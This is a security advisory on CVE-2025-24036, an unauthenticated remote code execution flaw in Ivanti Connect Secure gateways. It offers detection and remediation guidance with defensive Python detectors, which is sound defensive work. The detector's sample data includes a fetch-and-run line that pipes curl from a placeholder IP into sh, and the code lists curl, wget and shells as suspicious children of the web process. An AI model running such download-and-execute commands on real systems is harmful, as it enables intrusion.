[TIMESTAMP: 2026-03-02 03:15 UTC] [AUTHOR: Runtime Rebel Intel] [SEVERITY: CRITICAL]

CVE-2025-24036: Critical RCE in Ivanti Connect Secure — Patch Now

CRITICAL Vulnerabilities #CVE-2025-24036 #Ivanti #RCE
AI-Assisted Analysis
READ_TIME: 3 min read
// executive briefing tl;dr
  • [01] An unauthenticated remote code execution vulnerability in Ivanti Connect Secure and Ivanti Policy Secure gateways gives an attacker full control of the appliance and a persistent foothold inside the network.
  • [02] Ivanti Connect Secure and Ivanti Policy Secure builds that predate the 2025 security updates addressing this CVE are affected; confirm the exact affected and fixed builds for your release line in Ivanti's advisory.
  • [03] Administrators should apply the latest vendor patches immediately and run the external Integrity Checker Tool to look for indicators of compromise; patching alone does not remove persistence that was already deployed.

Analysis of CVE-2025-24036 and VPN Security Risks

Security researchers and the SANS ISC Stormcast have highlighted a critical RCE vulnerability tracked as CVE-2025-24036, which affects Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) gateways. The flaw lets an unauthenticated attacker execute arbitrary commands on the appliance's underlying operating system. Because these appliances sit at the network edge and terminate remote-access sessions, a successful exploit typically serves as the initial access vector for a broader campaign rather than as an end in itself.

The vulnerability is attributed to insufficient validation of input handled by web-facing components of the gateway software. A specially crafted request to an exposed API endpoint bypasses authentication and reaches a command-injection sink, so attacker-controlled input is executed as an operating-system command. The CVE carries a CVSS score of 10.0, the maximum, which means it is reachable over the network and requires no credentials and no user interaction, and it is straightforward to weaponize. This is particularly concerning because state-sponsored groups such as Volt Typhoon have historically exploited Ivanti appliances to maintain persistence and facilitate lateral movement inside high-value targets.

Unauthenticated RCE in Ivanti Policy Secure and Connect Secure

Technically, the unauthenticated RCE in Ivanti Policy Secure and Connect Secure comes down to a failure in the gateway's request-handling logic: the management interface or the client-facing VPN portal accepts attacker-controlled data on a path that should have required authentication, and that data reaches a command-execution primitive. Once code execution is achieved, the adversary typically establishes C2 communications and drops a web shell into the appliance's web content so that access survives reboots and session resets. In MITRE ATT&CK terms this is Exploit Public-Facing Application (T1190) followed by Server Software Component: Web Shell (T1505.003), a pattern that favors edge devices precisely because they run a vendor-controlled OS image on which no EDR agent can be installed, leaving defenders with almost no host-level visibility.

How to Detect CVE-2025-24036 Exploit Attempts

Security teams must focus on anomalies in the gateway's own logs and in network traffic at the edge, since the appliance cannot host a third-party agent. To detect CVE-2025-24036 exploit attempts, SOC analysts should watch for HTTP POST requests to /api/v1/configuration/ or similar administrative paths that arrive without a valid session or from sources outside the management network; such paths should never be reachable by unauthenticated clients, and an exploit request may return 200 and look like a routine admin call, so baseline which sources legitimately use them. Where process-creation telemetry reaches the SIEM, the web server process spawning curl, wget, sh or another interpreter is a primary indicator of compromise, because the gateway's web process has no legitimate reason to launch a shell.
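The two signals above, as an added example that is not part of the original article or of any Ivanti tooling: a small Python detector that parses constructed access-log lines in a combined-log style (with the Cookie header appended as a final quoted field, an assumption about the log format rather than Ivanti's real schema) and flags state-changing requests to the administrative path that carry no session or come from outside the management network, plus a second rule over constructed process-creation events that flags the web-server process spawning a shell or downloader. The management network range, session cookie name, web-server process names and sample data are placeholders.

```python
"""Added detection example for the two signals in the text:
(1) state-changing requests to admin API paths with no session cookie or from
    outside the management network, and
(2) shell/downloader children spawned by the web server process.
Log format, network ranges, cookie and process names are assumptions for the
demo, not Ivanti's actual log schema or process layout."""
import ipaddress
import re

# Assumption: combined-style access log with the Cookie header appended as a
# final quoted field (as nginx's $http_cookie would be); "-" means no cookie.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

ADMIN_PATH_PREFIXES = ("/api/v1/configuration/",)       # path named in the text; extend per deployment
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
MGMT_NETS = [ipaddress.ip_network("192.168.10.0/24")]   # assumed management network
SESSION_COOKIE = "session="                             # assumed session cookie name

WEB_PROCESSES = {"web", "httpd", "nginx"}               # assumed web-server process names
SUSPICIOUS_CHILDREN = {"curl", "wget", "sh", "bash", "perl", "python"}


def parse_access_line(line):
    """Return the parsed fields as a dict, or None if the line does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def in_mgmt_net(src):
    """True if src is an address inside one of the management networks."""
    try:
        ip = ipaddress.ip_address(src)
    except ValueError:
        return False
    return any(ip in net for net in MGMT_NETS)


def detect_unauth_admin_posts(lines):
    """Signal 1: state-changing requests to admin paths without a session
    cookie or from outside the management network. Status is kept because a
    200 here is more alarming than a 403 (the request succeeded)."""
    alerts = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None or rec["method"] not in STATE_CHANGING:
            continue
        if not rec["path"].startswith(ADMIN_PATH_PREFIXES):
            continue
        reasons = []
        if SESSION_COOKIE not in rec["cookie"]:
            reasons.append("no session cookie")
        if not in_mgmt_net(rec["src"]):
            reasons.append("source outside management network")
        if reasons:
            alerts.append({"src": rec["src"], "path": rec["path"],
                           "status": int(rec["status"]), "reasons": reasons})
    return alerts


def detect_web_spawned_shells(events):
    """Signal 2: process-creation events (dicts with parent/child/cmdline)
    where the web server directly spawns a shell, downloader or interpreter."""
    return [e for e in events
            if e["parent"] in WEB_PROCESSES and e["child"] in SUSPICIOUS_CHILDREN]


# Constructed sample data (not real appliance logs). Line 1 is a legitimate
# admin call; lines 2 and 4 are the kind of request the text describes.
SAMPLE_LOG_LINES = [
    '192.168.10.20 - admin [02/Mar/2026:02:40:02 +0000] "POST /api/v1/configuration/ HTTP/1.1" 200 512 "-" "Mozilla/5.0" "session=7f3a9c"',
    '203.0.113.77 - - [02/Mar/2026:02:58:11 +0000] "POST /api/v1/configuration/ HTTP/1.1" 200 412 "-" "python-requests/2.31" "-"',
    '203.0.113.77 - - [02/Mar/2026:02:58:12 +0000] "GET /login HTTP/1.1" 200 1890 "-" "python-requests/2.31" "-"',
    '198.51.100.9 - - [02/Mar/2026:03:01:45 +0000] "PUT /api/v1/configuration/users HTTP/1.1" 403 0 "-" "curl/8.5.0" "-"',
    'garbage line that does not parse',
]
SAMPLE_PROC_EVENTS = [
    {"ts": "2026-03-02T02:58:11Z", "parent": "web", "child": "sh", "cmdline": "sh -c 'curl http://203.0.113.77/x | sh'"},
    {"ts": "2026-03-02T02:58:12Z", "parent": "sh", "child": "curl", "cmdline": "curl http://203.0.113.77/x"},
    {"ts": "2026-03-02T03:00:00Z", "parent": "cron", "child": "sh", "cmdline": "sh /home/bin/logrotate.sh"},
]

if __name__ == "__main__":
    for a in detect_unauth_admin_posts(SAMPLE_LOG_LINES):
        print("ALERT request:", a)
    for e in detect_web_spawned_shells(SAMPLE_PROC_EVENTS):
        print("ALERT process:", e)
```

The process rule matches only direct children of the web process: in the sample data the curl launched by the injected sh is not flagged because its parent is sh, so a production rule should walk the process tree (or carry the web server's PID through the ancestry) rather than match a single parent-child pair. Tune ADMIN_PATH_PREFIXES and MGMT_NETS to the deployment, and treat the HTTP rule as a triage filter: a successful exploit request looks like a legitimate configuration call apart from who sent it and whether it carried a session.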

Defenders should also run the Ivanti Integrity Checker Tool (ICT), which compares the appliance's current file system against a known-good baseline. Any new or modified files under /home/web/ or /tmp/ should be treated as evidence of a potential compromise until explained. Use the external ICT rather than a checker that runs on the appliance itself: an attacker who has achieved privilege escalation on the box can tamper with an on-box checker or its baseline so that it reports a clean result.
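What the ICT comparison amounts to, as an added illustration in Python (not Ivanti's ICT, its baseline format, or code from the article): hash every regular file under the directories named above, diff the result against a previously recorded manifest, and report new, modified and deleted paths. The demo builds a throwaway directory tree standing in for the appliance, so the paths and file contents are constructed.

```python
"""Added illustration of an integrity check: hash files under the watched
directories, compare with a known-good manifest, report deviations.
Not Ivanti's ICT; the tree and contents built in demo() are constructed."""
import hashlib
import os
import tempfile

WATCHED_DIRS = ("/home/web", "/tmp")  # directories the text singles out


def build_manifest(root, watched=WATCHED_DIRS):
    """Return {path: sha256 hex} for every regular file under root/<dir> for
    each watched dir. `root` is the appliance filesystem root or a mounted
    image, so the same function works on an offline copy."""
    manifest = {}
    for sub in watched:
        base = os.path.join(root, sub.lstrip("/"))
        for dirpath, _dirs, files in os.walk(base):
            for name in files:
                full = os.path.join(dirpath, name)
                if os.path.islink(full):
                    continue  # hash regular files only, not link targets
                rel = "/" + os.path.relpath(full, root)
                h = hashlib.sha256()
                with open(full, "rb") as fh:
                    for chunk in iter(lambda: fh.read(1 << 16), b""):
                        h.update(chunk)
                manifest[rel] = h.hexdigest()
    return manifest


def diff_manifest(baseline, current):
    """Compare two manifests; anything in 'new' or 'modified' under the
    watched dirs is a potential compromise until explained."""
    return {
        "new": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "deleted": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Build a stand-in tree, baseline it, simulate post-compromise changes
    (a tampered CGI, a dropped file, a removed cache) and return the diff."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data):
            path = os.path.join(root, rel.lstrip("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as fh:
                fh.write(data)

        write("/home/web/index.cgi", "#!/bin/sh\necho ok\n")
        write("/home/web/static/app.js", "console.log('app');\n")
        write("/tmp/session.cache", "")
        baseline = build_manifest(root)

        # constructed post-compromise state
        write("/home/web/index.cgi", "#!/bin/sh\n# tampered\necho ok\n")
        write("/home/web/static/help.php", "# placeholder for a dropped web shell\n")
        os.remove(os.path.join(root, "tmp", "session.cache"))
        current = build_manifest(root)
        return diff_manifest(baseline, current)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

The comparison itself is trivial; what makes the real ICT useful is that its baseline comes from the vendor's build and that it runs from outside the appliance. A manifest stored on the box, or a checker executed by the box, is only as trustworthy as the box, which is why the external ICT is preferred. Files legitimately generated at runtime (logs, session caches) show up as noise under /tmp and need an allow-list rather than being dropped from the baseline.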

Remediation and Ivanti Connect Secure 22.7R2 Patch Guidance

The most effective defense is immediate application of the vendor's security updates. Following the Ivanti Connect Secure 22.7R2 patch guidance, administrators should upgrade to the fixed build for their release line (e.g., 22.7R2.4 or higher), after confirming the exact fixed version and the CVE identifier against Ivanti's advisory, since fixed builds differ across release lines and advisories are revised. If patching cannot happen immediately, remove the management interface from the internet entirely and reach it only through a Zero Trust access proxy or a dedicated management network. This reduces exposure of the administrative endpoints but does not protect the client-facing VPN portal, which must remain reachable and is also named as an attack surface, so it is a stopgap rather than a substitute for the patch.

Before patching, take a snapshot or forensic image of the appliance where possible, so that if the system was already compromised the evidence is preserved for the incident response team. Patching closes the entry point but does not remove a web shell or other persistence that was already deployed, so if the ICT reports findings, rebuild the appliance from a known-good image rather than patching in place. After patching, terminate all active sessions and rotate local credentials, including API keys and certificates, so that stolen session tokens or secrets cannot be reused for continued access.
